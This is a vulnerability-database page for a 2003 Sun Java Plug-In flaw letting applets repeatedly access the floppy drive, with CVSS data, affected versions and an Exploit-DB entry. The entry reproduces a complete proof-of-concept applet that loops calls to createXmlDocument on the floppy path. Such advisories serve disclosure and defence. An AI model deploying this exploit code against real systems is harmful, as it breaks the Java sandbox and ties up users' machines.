Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Sun Java Plug-In 1.4 through 1.4.2_02 allows remote attackers to repeatedly access the floppy drive via the createXmlDocument method in the org.apache.crimson.tree.XmlDocument class, which violates the Java security model.
CVE Informations
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 6.4 | AV:N/AC:L/Au:N/C:P/I:P/A:N | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 23270
Publication date : 2003-10-20 22h00 +00:00
Author : Marc Schoenefeld
EDB Verified : Yes
source: https://www.securityfocus.com/bid/8867/info
A weakness has been reported in Java implementations that may constitute unauthorized access by Java applets to floppy devices. This weakness appears to present a flaw in the Java security model.
This issue was reported in Java Plug-in 1.4.x versions on Microsoft Windows operating systems, when run with Internet Explorer. Other environments and versions may also be affected.
import java.awt.Label;
public class MyFloppySucks extends java.applet.Applet {
private Label m_labVersionVendor;
public MyFloppySucks () //constructor
{
m_labVersionVendor = new Label ("Java Floppy Stress Testing Applet,
(2003) www.illegalaccess.org" +" / Java Version: " +
System.getProperty("java.version")+
" from "+System.getProperty("java.vendor"));
this.add(m_labVersionVendor);
}
public void paint(java.awt.Graphics g) {
while (1==1)
try {
org.apache.crimson.tree.XmlDocument.createXmlDocument("file:///a:/",false);
}
catch (Exception e) {
System.out.println("Java Floppy Stress Testing Applet,
(2003) www.illegalaccess.org");
}
}
}
Products Mentioned
Configuraton 0
Sun>>Java_plug-in >> Version 1.4
- Sun>>Java_plug-in >> Version 1.4 (Open CPE detail)
Sun>>Java_plug-in >> Version 1.4.2
- Sun>>Java_plug-in >> Version 1.4.2 (Open CPE detail)
Sun>>Java_plug-in >> Version 1.4.2_01
- Sun>>Java_plug-in >> Version 1.4.2_01 (Open CPE detail)
Sun>>Java_plug-in >> Version 1.4.2_02
- Sun>>Java_plug-in >> Version 1.4.2_02 (Open CPE detail)
References
The information presented on CVE Find originates from several carefully selected reference sources. CVE data is provided by MITRE Corporation and the National Vulnerability Database (NVD). The Known Exploited Vulnerabilities (KEV) catalog is sourced from the Cybersecurity and Infrastructure Security Agency (CISA), while EPSS scores come from FIRST.org. Additionally, data regarding software weaknesses (CWE) and common attack patterns (CAPEC) is maintained by MITRE Corporation, and information on hardware and software configurations (CPE) is provided by the NVD.